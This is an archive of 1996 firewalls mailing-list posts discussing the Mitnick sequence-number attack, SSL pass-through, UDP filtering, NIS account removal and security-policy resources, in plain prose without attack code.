<199601111046.CAA18112@archimedes.vislab.navy.mil> To: firewalls@greatcircle.com Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-reply-to: Your message of "Thu, 11 Jan 1996 20:25:04 +1030." <9601110955.AA27779@bunya.awadi> Date: Thu, 11 Jan 1996 02:46:14 -0800 From: Benjamin Allan Smith Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brain21 wrote: >Hell, my father used >to do top secret work for the Dept. of Defense (he neede "Q" clearance, >and needs higher now) and the office where he worked communicated to it's >other offices over the net. They used netcom. Not too terribly secure >if you ask me. They did not use encryption. I highly doubt that. Every machine that I have seen on base which has Secret (or higher) data is not allowed to have *any* physical connection with the internet (the mjr 100% sure firewall to the internet--cut the wires). Once someone inadvertantly emailed the classified name of a project over a network connected to the Internet. The day was spent completely wiping all of the hard drives on all of the machines that might have received that email (3 complete overwrites with random data if I recall correctly) and then the OS and data were restored from the previous night's backups. A head rolled for that error. So if all that effort was made over a single word, I *highly* doubt that you father used netcom to discuss classified matters. Ben ------------------------------------------------------------------------------- Benjamin Smith------------bens@vislab.navy.mil---------1972 Land Rover SIII 88 Science Applications International Corporation Naval Air Warfare Center, Weapons Division, China Lake "...If I were running such a contest, I would specifically eliminate any entry from Ben involving driving the [Land] Rover anywhere. He'd drive it up the Amazon basin for a half can of Jolt and a stale cookie..." --Kevin Archie From firewalls-owner Thu Jan 11 03:14:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA15242 for firewalls-outgoing; Thu, 11 Jan 1996 03:02:06 -0800 (PST) Received: from sheeba.rcooper.the-wire.com (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id DAA15228 for ; Thu, 11 Jan 1996 03:01:58 -0800 (PST) Received: from rwcooper.rcooper.the-wire.com ([205.206.47.2]) by sheeba.rcooper.the-wire.com (post.office MTA v1.9.1 evaluation license) with SMTP id AAA217; Thu, 11 Jan 1996 05:59:47 -0500 Received: by rwcooper.rcooper.the-wire.com with Microsoft Mail id <01BAE04E.69CB1DE0@rwcooper.rcooper.the-wire.com>; Thu, 11 Jan 1996 17:58:29 -0500 Message-ID: <01BAE04E.69CB1DE0@rwcooper.rcooper.the-wire.com> From: Russ Cooper To: RDA , "'Rabid Wombat'" Cc: "firewalls@GreatCircle.COM" Subject: RE: firewalls reviews/comparisons Date: Thu, 11 Jan 1996 17:58:27 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk First of all, IPX does not mean Netware servers any more. Microsoft uses IPX as there strategic transport of choice within their internal networks, and actively promotes its use on customer NT-based networks, with no thought to the presence of Netware servers. Much of the functionality of NT's domain systems is seriously hampered by TCP/IP yet robust with IPX/SPX. Firefox's Novix (www.firefox.com) is a great gateway product if you do have a Novell server, but it is not a Firewall. It does nothing, for example, to protect two privately connected networks from each other, where a firewall could handle those risks. Anyway, look to Raptor (www.raptor.com) to make an NT-based Eagle announcement on Monday. That will be the first true NT-based Firewall. As for Catapult from Microsoft, I'm still under NDA, so its still not talked about. Cheers, Russ Cooper Sr. Internet Integration Engineer SHL/Computer Innovations rcooper@the-wire.com -- rwcooper@shl.com "can someone tell me where to go today to get the money to go to where I want to go today" From firewalls-owner Thu Jan 11 04:14:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA17330 for firewalls-outgoing; Thu, 11 Jan 1996 04:00:12 -0800 (PST) Received: from gmap-gw.leeds.ac.uk (gmap15.leeds.ac.uk [129.11.84.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id DAA17296 for ; Thu, 11 Jan 1996 03:59:54 -0800 (PST) Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.7.3/8.6.9) with SMTP id LAA20340 for ; Thu, 11 Jan 1996 11:59:15 GMT Received: from gmap.leeds.ac.uk (dannyc@gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id JAA06117 for ; Thu, 11 Jan 1996 09:42:00 GMT From: Danny Cox Date: Thu, 11 Jan 1996 09:40:54 GMT Message-Id: <223.9601110940@gmap.leeds.ac.uk> X-Planation: X-Faces images can be viewed with the XFaces program To: firewalls@greatcircle.com Subject: Re: Firewalls setup X-Sun-Charset: US-ASCII X-Face: (:_YnQcTM$q\Nl0.mYy:C'Y|(;&7.2m~Rc%xt To secure the internet connection, the mail and the dail out service > we plan on using > Firewall-1. The firewall will be located as follows: etc. In keeping with what I was asking recently, my understanding of Firewall-1 is that it is largely a router. Given this, are the CISCOs redundant in this design? This isn't meant to be critical btw; it's an issue I'm concerned about .. Thanks all, Danny From firewalls-owner Thu Jan 11 04:29:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA17089 for firewalls-outgoing; Thu, 11 Jan 1996 03:50:58 -0800 (PST) Received: from uniwa.uwa.edu.au (uniwa.uwa.edu.au [130.95.128.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA17084 for ; Thu, 11 Jan 1996 03:50:48 -0800 (PST) Received: from hedunx.hedland.edu.au ([223.254.252.2]) by uniwa.uwa.edu.au (8.6.11/8.6.9) with ESMTP id TAA22187; Thu, 11 Jan 1996 19:48:13 +0800 Received: from localhost (hartr@localhost) by hedunx.hedland.edu.au (8.6.4/8.6.4) id QAA16613; Thu, 11 Jan 1996 16:46:30 +0800 Date: Thu, 11 Jan 1996 16:46:29 +0800 (WST) From: Robert Hart Subject: Re: Internet Policy/Security Policy To: Andrew Cameron cc: firewalls@GreatCircle.COM In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jan 1996, Andrew Cameron wrote: > > I would like to know where I can find examples of an Internet/Security > Policy for a company. > > I will need to write one in the near future and would like to draw on > the experiance of others. Well, I have found the O'Reilly book "Building Internet Firewalls" chapter on this quite useful as I have been drafting up a policy for here... --- Robert Hart hartr@hedunx.hedland.edu.au Voice: +61 (0)91 72 0429 Fax: +61 (0)91 72 3560 Hedland College, PMB 1, South Hedland WA 6722 Australia From firewalls-owner Thu Jan 11 04:59:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA18180 for firewalls-outgoing; Thu, 11 Jan 1996 04:48:13 -0800 (PST) Received: from cbn.cbn.com.sg (cbn.cbn.com.sg [203.120.18.128]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA18175 for ; Thu, 11 Jan 1996 04:48:07 -0800 (PST) Received: (from ngps@localhost) by cbn.cbn.com.sg (8.6.12/8.6.12) id UAA12946; Thu, 11 Jan 1996 20:41:13 +0800 Date: Thu, 11 Jan 1996 20:41:13 +0800 (SST) From: Ng Pheng Siong To: Brain21 cc: Frank Willoughby , firewalls@GreatCircle.COM, John Young Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jan 1996, Brain21 wrote: > I would like to know this... if Shimomura is so good (an I actually > believe that he may be) then why did he leave the r-utils enabled? Why > did he not use TCPWrappers to prevent spoofing? Why did he allow people > to see inside his network (Mitnick saw that there was a machine > "X-something" that he believed was trusted by Shimomura's machine)? Shimomura had almost complete packet traces of the break-in, which allowed him to reconstruct the attack. It was a trap. - PS -- Ng Pheng Siong NetCentre Pte Ltd * Singapore Finger for PGP key. From firewalls-owner Thu Jan 11 05:43:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA19035 for firewalls-outgoing; Thu, 11 Jan 1996 05:23:55 -0800 (PST) Received: from nastg.gsfc.nasa.gov (nastg.gsfc.nasa.gov [192.86.21.220]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA19030; Thu, 11 Jan 1996 05:23:47 -0800 (PST) Received: from maple.gsfc.nasa.gov by nastg.gsfc.nasa.gov (8.6.11/1.35) id IAA02782; Thu, 11 Jan 1996 08:31:01 -0500 Message-Id: <199601111331.IAA02782@nastg.gsfc.nasa.gov> X-Sender: ddriesma@nastg X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jan 1996 08:22:06 -0500 To: Firewalls@GreatCircle.COM, firewalls-digest@GreatCircle.COM From: ddriesma@nastg.gsfc.nasa.gov (Debbie Driesman) Subject: Re: Firewalls-Digest V5 #2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Padgett, Where can I get more information on PNS? I've tried a number of the web search tools and they didn't find anything. Thanks, Debbie >Firewalls-Digest Tuesday, 2 January 1996 Volume 05 : Number 002 > >From: "A. Padgett Peterson, P.E. Information Security" >Date: Tue, 2 Jan 1996 14:02:49 -0500 (EST) >Subject: Compression is useful - but for security, not > >>Being concerned about security, I did not want to present them a plan that >>did not also include some security considerations. Some of the Government >>people came up with the idea of using a compression box to reduce the number >>of required T1s. The box they recommended has V.35 ports, and would sit >>between the Cisco and the CSU/DSU. To be fair, the vendor told me his >>box did not do encryption, but since the data was compressed, it would not >>be in plain view. > >1) Compression aids performance. It does not aid security (at best is SBO). > >2) Sounds like you have dedicated lines. Have you considered requiring PNS > (Protected Network Service) from the telco ? (May have a different name > but should be available). With this your lines are isolated/protected > from other trunks. A dedicated line is not at the same risk as the Internet > and PNS is generally "good enough" for SBU (Sensitive but Unclassified) > traffic. > > When the idea was introduced a couple of years ago, it was to be > approved by the NSA and was a part of the FTS contract. Dunno where it > is now. > Warmly, > Padgett ***************************************************************************** Debbie Driesman, Computer Sciences Corp., 7700 Hubble Drive, Lanham, MD 20706 Phone: 301-794-2822, Fax: 301-794-9530 Email: ddriesma@nastg.gsfc.nasa.gov ***************************************************************************** From firewalls-owner Thu Jan 11 06:03:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA18880 for firewalls-outgoing; Thu, 11 Jan 1996 05:19:15 -0800 (PST) Received: from mwunix.mitre.org (mwunix.mitre.org [128.29.154.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA18873 for ; Thu, 11 Jan 1996 05:19:10 -0800 (PST) Received: from smiley.sit (smiley.mitre.org [128.29.140.20]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id IAA03621; Thu, 11 Jan 1996 08:18:13 -0500 Received: from [128.29.140.130] (mckenney-mac) by smiley.sit (4.1/SMI-4.1) id AA17824; Thu, 11 Jan 96 08:18:03 EST Date: Thu, 11 Jan 96 08:18:02 EST Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: pf26376@ci.deere.com (Paul A. Fisher) From: mckenney@smiley.mitre.org (Brian W. McKenney) Subject: Re: Allow SSL through a firewall? Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Subject: Allow SSL through a firewall? > >I would like to allow access from the Internet to a WWW server that would >have access to our corporate data. Because of the security implications, >I would like that WWW server to be behind a firewall. I have tried to >outline my design below and I would appreciate any comments about >possible problems I may be opening myself up for. > > > ************ ! > client------* Internet *------Firewall---!---WWWserver > ************ ! > Internal > Network > >The firewall would 'plug' (*not* proxy) port 443 inbound to the WWWserver. >The WWWserver would run Netscape's Commerce server and use SSL to encrypt >the entire session (non-SSL connections would be rejected). At that point >we would have an encrypted session between the client and server that can >pass whatever is necessary for the application (including userid's and >passwords?). The only problem that I see is that plug-gw must keep track of who is permitted to use the plug-gw proxy (via IP addresses). If you have a lot of consumers that must access your internal server then this could create a large net-perm table. Yes, you could set up a wildcard for multiple incoming connection hosts. Also note that there are handshake connections (handshake protocol) between the client and the server prior to establishing an encrypted session. These packets are not encrypted. Some would say that a screening router (say in a hybrid firewall) could perform a similar function. I would continue to run a stripped down SSL-based Web server. Depending on your firewall, I would suggest that you look at the Netscape SSL proxy and compare both approaches. An SSL proxy has the chance of getting enhanced over time, I doubt that plug-gw will be enhanced in the future. Other firewall products also plan to support SSL proxies. The strength of the encryption process also depends on what algorithms are employed between the client and server. Some would say that some exportable algorithms are not strong and could be broken. Another attack mentioned in the SSLv3 spec is that an attacker may try to make the clients and servers fall back to SSLv2, then they could exploit SSLv2 weaknesses (this can only happen if both parties employ an SSLv2 handshake). > >The purpose of 'plugging' port 443 through the firewall is the WWWserver >would be behind the firewall and thus not be subject to attack using other >services (telnet, sendmail, etc.). The http server would have to be >secured against outside attack, but not the entire machine. Also, this >allows the applications running on the WWWserver to have access to all >of the internal data servers without having to find their way through >the firewall. > >There are still some questions that we need to answer from an application >standpoint: > Is SSL encryption 'strong' enough for our purposes? This depends on what you want to protect. SSLv3 is much stronger than SSLv2. However, as with any protocol implementation, a new vulnerability may be discovered. The algorithms proposed in the SSLv3 spec (e.g., MD5, SHA, RSA) are commercial algorithms that are used in lots of commercial products. Netscape also plans to support FORTEZZA (NSA cryptography). > Does the 'magic cookie' in the client present a problem? >But from a network security standpoint, we shouldn't have a problem. > >Does anyone see any other problems with this proposed configuration? > >TIA, >Paul > >Paul A. Fisher paulf@ci.deere.com >Deere & Company, W3LSW ...uunet!deere!paulf >John Deere Road (309) 765-4547 >Moline, Illinois 61265 (309) 765-5242 FAX From firewalls-owner Thu Jan 11 06:07:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA19260 for firewalls-outgoing; Thu, 11 Jan 1996 05:30:31 -0800 (PST) Received: from wire.paladin.com (wire.paladin.com [198.69.226.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA19243 for ; Thu, 11 Jan 1996 05:30:23 -0800 (PST) Received: (cjwoods@localhost) by wire.paladin.com (8.6.8/8.6.5) id IAA06393; Thu, 11 Jan 1996 08:24:32 -0500 Date: Thu, 11 Jan 1996 08:24:32 -0500 (EST) From: Chris Woods To: "Steven K. Sharp" cc: Firewalls@GreatCircle.COM Subject: Re: UDP and the unclean... In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jan 1996, Steven K. Sharp wrote: > Please forgive me if this is a stupid question, but why is UDP such a bad > thing? Especially things like RealAudio, this uses UDP to communicate (as > do many other programs). What security risk does UDP pose? As someone else detailed (more eloquently) earlier: UDP is a connectionless protocol: i.e., it does not require an established session for packets to be sent to and fro. For lack of a simpler, easier explanation: the sender "spews" the packets without first establishing a connected session, while the intended (or unintended...) recipient takes the packets based on a few limited criteria (source address, destination address/port, etc). RealAudio "randomizes" the UDP port that it tries to connect to within a range. That means that to accept RealAudio on your protected network, you must open a hole in your filter to allow UDP on a number of ports. Because of the way other UDP-based apps were written, this presents another vulnerability. > I've seen that most people filter out all UDP first and then work from there > with TCP. Would it be a gaping hole to allow it? See above, hope it clears things up for you. The last explanation did for me... Chris Woods Systems Administrator cjwoods@paladin.com (office) Paladin Computing Solutions cjwoods@gigotech.net (home) http://www.paladin.com "A computer without Windows is like a fish without a bicycle." From firewalls-owner Thu Jan 11 06:14:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA20665 for firewalls-outgoing; Thu, 11 Jan 1996 06:11:47 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA20660 for ; Thu, 11 Jan 1996 06:11:43 -0800 (PST) Date: Thu, 11 Jan 1996 9:10:47 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <960111091047.20200f9e@hobbes.orl.mmc.com> Subject: Sequence number attacks Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve rote: >A couple of months ago, I did come up with a strong but simple defense >against sequence number attacks. For details, see >ftp://ds.internic.net/internet-drafts/draft-rfced-info-bellovin-00.txt Is easy also to make the first line in your firewall ACL "Deny incoming ". Belt and suspenders are good 8*). Warmly, Padgett From firewalls-owner Thu Jan 11 06:52:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA20553 for firewalls-outgoing; Thu, 11 Jan 1996 06:06:37 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA20548 for ; Thu, 11 Jan 1996 06:06:33 -0800 (PST) Date: Thu, 11 Jan 1996 9:05:36 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <960111090536.20200f9e@hobbes.orl.mmc.com> Subject: re: "Please reply to Email address and not to the list" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I would appreciate it if you can take a moment to respond to my email address >(not the whole list) to "vote" on if you think SNMP traffic should pass through >a Firewall. Is hard to do if the E-mail address is not in the body of the message and your E-Mail system does not preserve headers. PLEASE, if you want a direct reply, end the message with a name and E-mail address. Warmly, Padgett From firewalls-owner Thu Jan 11 06:59:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA21660 for firewalls-outgoing; Thu, 11 Jan 1996 06:44:10 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA21650 for ; Thu, 11 Jan 1996 06:44:05 -0800 (PST) Date: Thu, 11 Jan 1996 9:43:08 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <960111094308.20200f9e@hobbes.orl.mmc.com> Subject: PNS Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Where can I get more information on PNS? I've tried a number of the web >search tools and they didn't find anything. Is a telco service - not that many are on the web - call your local telephone office. Is unlikely that the first person you reach will know what Protected Network Services are but tell them it is a security feature and eventually you should get to the right preson. Warmly, Padgett From firewalls-owner Thu Jan 11 07:27:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA20396 for firewalls-outgoing; Thu, 11 Jan 1996 05:59:42 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA20391 for ; Thu, 11 Jan 1996 05:59:37 -0800 (PST) Date: Thu, 11 Jan 1996 8:58:40 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <960111085840.20200f9e@hobbes.orl.mmc.com> Subject: Re: Mitnik and helpers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank rites: >In defense of Shimomura (who isn't here >to defend himself), I'll stick to what I've heard that it wasn't anything >he had any choice over. I have had trouble with this whole thing since the beginning. Security is not easy, is often inconvenient, but IMNSHO certain things go with the job. I use this account not because it has all of the bells and whistles but because it is more secure than most other options (note: I did not say "perfectly secure"). My "secure" mail server is an old Zenith 386sx-16 with 2 Mb of RAM and a 40 Mb disk. All it knows how to do is to receive mail and it keeps a log of all transactions - is hard to erase a line when it was printed by a Panasonic 1090 - onna PC there is this cntrl-P command 8*). When I send mail from this workstation (which cannot receive any itself), the reply address is either the mainframe or my local mail PC. Over the years I have found too many interactions between systems after the fact that compromise security and simply find it easier to segregate tasks between machines and use a different (cheap) machine for each task. Not to say I don't like Suns, have a Sparc sitting next to me, just that a PC does so many things so easily and is what the users I support have. Also what I have at home (an absurd number but mostly @ $25 each so what the heck). However sensitive stuff on a UNIX box on a network that has "R" commands enabled ? With a new CERT vulnerability identified every month ? Give me a break. Warmly, Padgett From firewalls-owner Thu Jan 11 07:29:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA21098 for firewalls-outgoing; Thu, 11 Jan 1996 06:26:38 -0800 (PST) Received: from gauntlet-1.trusted.com (gauntlet-1.trusted.com [204.254.155.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA21093 for ; Thu, 11 Jan 1996 06:26:34 -0800 (PST) Received: by gauntlet-1.trusted.com; id JAA16404; Thu, 11 Jan 1996 09:29:19 -0500 Received: from vanidor.trusted.com(204.254.155.8) by gauntlet-1.trusted.com via smap (T3.1) id xmac16390; Thu, 11 Jan 96 09:28:53 -0500 Message-Id: <2.2.16.19960111142111.208fbaca@gauntlet-1.trusted.com> X-Sender: avolio@gauntlet-1.trusted.com X-Mailer: Windows Eudora Pro Version 2.2 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jan 1996 09:21:11 -0500 To: HFDK41A@prodigy.com (MR. JOHN K MOLNAR), firewalls@GreatCircle.COM From: Frederick M Avolio Subject: Re: Mergent Gauntlet? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk TIS has about 50 or so resellers world-wide. Mergent is an authorized reseller and a bunch of extremely smart people. You are correct. TIS owns the name "Gauntlet" and the Gauntlet Internet Firewall is ours. Anyone selling it should be an authorized reseller. If you are unsure, you can always drop a note to gauntlet-sales@tis.com. Fred At 02:05 PM 1/10/96 EST, MR. JOHN K MOLNAR wrote: >Hi > >I got a fax this morning from Mergent, offering to sell me their >Gauntlet Firewall??? > >What's a Gauntlet if it's not from TIS? > >Or is this the same stuff?? > >Confused. > >Thanks, > >-John Molnar > > From firewalls-owner Thu Jan 11 07:30:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA21037 for firewalls-outgoing; Thu, 11 Jan 1996 06:24:24 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA21032 for ; Thu, 11 Jan 1996 06:24:20 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id GAA01166; Thu, 11 Jan 1996 06:21:23 -0800 Received: from disperse.demon.co.uk(158.152.1.77) by mycroft via smap (V1.3mjr) id sma001162; Thu Jan 11 06:20:43 1996 Received: from theboard.reednews.co.uk ([194.159.23.1]) by relay-2.mail.demon.net id aa12013; 11 Jan 96 14:21 GMT Received: by reednews.co.uk (5.x/SMI-SVR4) id AA26523; Thu, 11 Jan 1996 14:23:00 GMT From: Gavin Aiken Message-Id: <9601111423.AA26523@reednews.co.uk> Subject: Re: Sunos and NIS To: Firewalls@greatcircle.com Date: Thu, 11 Jan 1996 14:22:59 +0000 (GMT) In-Reply-To: <199601110730.XAA06814@miles.greatcircle.com> from "firewalls-digest-owner@uunet.uu.net" at Jan 10, 96 11:30:28 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I just want some help understanding a fact happens here on friday. > I'm the sysadmin in a lab with 4 HP and 2 Suns. I have work a lot > with the HP, but almost never with the Suns, because there was > another person that did it. This person let the lab, and now I > have to learn about SunOS and BSD-like UNIX. > There is a NIS server lets call it "A" and there is a NIS client lets > call it "B". On thursday I delete a user from both systems, because > we don't want him to access our net. On friday I found that the "user" > I deleted the day before, accesed "B", and he has no login in the > /etc/passwd; /etc/group, etc. > I was looking with the last command what did happened, and I saw that > the user accesed plenty times machine "B" that day. > I am really new in sysadmin labors in the Sun machines, I really know > HP-UX. Maybe there is something I don't know is happening with the > NIS service and something about the Yellow Pages service. > I have to tell you that the person that was here before me, just > let the Suns like there where. I don't know what did they do there, > I am knowing it rigth now. > Thanks for helping me Carolina, Have you updated the NIS passwd map? If you update the /etc/passwd file, you still need to let NIS know that this has changed. Under NIS+: cd /etc; nisaddent -m -f hosts hosts Under NIS/YP: cd /var/yp; make -- Gavin Aiken | IT Dept, RRN Lancs | http://www.reednews.co.uk Newspaper House | Work: +44 1254 678678 High Street | Fax: +44 1254 673347 Blackburn | Home: +44 1254 812956 _________________________________________________________ *finger gavin@theboard.reednews.co.uk for PGP Public Key* From firewalls-owner Thu Jan 11 07:32:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA20136 for firewalls-outgoing; Thu, 11 Jan 1996 05:51:43 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA20130 for ; Thu, 11 Jan 1996 05:51:39 -0800 (PST) Received: from pm4-13.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA28877; Thu, 11 Jan 96 08:50:33 -0500 Date: Thu, 11 Jan 96 08:50:33 -0500 Message-Id: <9601111350.AA28877@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Ng Pheng Siong From: frankw@in.net (Frank Willoughby) Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From the desk of Ng Pheng Siong: >On Wed, 10 Jan 1996, Brain21 wrote: >> I would like to know this... if Shimomura is so good (an I actually >> believe that he may be) then why did he leave the r-utils enabled? Why >> did he not use TCPWrappers to prevent spoofing? Why did he allow people >> to see inside his network (Mitnick saw that there was a machine >> "X-something" that he believed was trusted by Shimomura's machine)? > >Shimomura had almost complete packet traces of the break-in, which >allowed him to reconstruct the attack. > >It was a trap. > > >- PS >-- >Ng Pheng Siong >NetCentre Pte Ltd * Singapore > >Finger for PGP key. Not necessarily. I could easily imagine a dedicated Information Security Officer who was ordered to do something incredibly stupid (like trust external hosts on the internet, etc) doing a complete logging of all packets across that connection for the possible purposes of: o detecting exploitations of the gaping security hole (including learning about new attacks you haven't previously thought of). o provide evidence for possible prosecution (people frequently don't decide if they want to prosecute until after the incident has occured - another unwise decision IMHO). Again, this is a by-product of the manager's decision to do something stupid, and not the intent of the vulnerability itself. o background material for a "See, I told you this could happen and it did" if you are an individual who likes these kind of things (I don't). Again, I'm willing to give Tsutomu the benefit of a doubt until more facts are presented. Those who have been on the list for a month or two are gently reminded of my posting containing a brief story about a punker & a businessman which mentions this in greater detail. The mail was posted on 12/23/95 at 10:52am and had the subject of: "Re: FW-1 does not prevent session hijacking? Please support claim." The story is in the 2nd paragraph from the bottom of the mail. Best Regards, Frank Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified/ The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. From firewalls-owner Thu Jan 11 07:34:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA20243 for firewalls-outgoing; Thu, 11 Jan 1996 05:53:44 -0800 (PST) Received: from magneto.bosch.com (magneto.bosch.com [198.111.120.52]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA20238 for ; Thu, 11 Jan 1996 05:53:39 -0800 (PST) Received: by magneto.bosch.com; id IAA02701; Thu, 11 Jan 1996 08:47:47 -0500 Received: from cyber.rbus(192.168.2.2) by magneto via smap (V1.3) id sma002699; Thu Jan 11 08:47:23 1996 Received: by inet.rbus; id IAA08125; Thu, 11 Jan 1996 08:50:43 -0500 Received: from mail(172.16.1.21) by inet.rbus via smap (V1.3) id sma008123; Thu Jan 11 08:50:41 1996 Received: by mail.fh.rbus; id IAA04803; Thu, 11 Jan 1996 08:49:08 -0500 Date: Thu, 11 Jan 1996 08:49:08 -0500 Message-Id: <199601111349.IAA04803@mail.fh.rbus> X-Sender: cwerner@fh.rbus X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: "Christopher L. Werner" Subject: Re: Internet Policy/Security Policy Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 10:11 PM 1/10/96 +0200, Andrew Cameron wrote: > >I would like to know where I can find examples of an Internet/Security >Policy for a company. > >I will need to write one in the near future and would like to draw on >the experiance of others. Ah, an old (but ever popular) question with a new subject title :-) 1) ftp://ftp.greatcircle.com has archives of this mailing list. If you download the July, August, September, and November 1995 files and grep for the following subject lines you'll get additional commentary on the various publications: InfoSec policies made easy? Policy Statement on Internet Usage Internet security -organ Internet access guidelines Sample Security Policy? 2) There are web sites: http://musie.phlab.missouri.edu/Policy/copies/tamu-collection1.html http://gnn.interpath.net/gnn/meta/internet/forum/index.html http://www.raptor.com (Internet Security Library) http://ciac.llnl.gov/cstc/CIACHome.html http://www.isse.gmu.edu:80/~gmuisi http://hightop.nrl.navy.mil http://csrc.ncsl.nist.gov http://www.crpht.lu/CNS/html/PubServ/Security/documents.htm 3) There are books: "Firewalls and Internet Security - repelling the wily hacker". by Cheswick and Bellovin ISBN: 0-201-63357-4. "Internet Firewalls and Network Security" by Siyan and Hare ISBN: 1-56205-437-6 "Information Security Policies Made Easy" by Wood ISBN: 1-881585-01-8 "Building Internet Firewalls" by Chapman and Zwicky ISBN: 1-56592-124-0 (Forgot Title) by Cohen 4) There are Specs: RFC-1244 Site Security Handbook This should get you started.... (Hey - Brent/Marcus - shouldn't this be in the firewalls FAQ?) -------------------------------------------------------------------- Opinions expressed are mine and not those of my employer. -------------------------------------------------------------------- Christopher L. Werner Robert Bosch Corporation System Engineer 38000 Hills Tech Dr. (810)553-1389 Farmington Hills, MI 48331-3417 From firewalls-owner Thu Jan 11 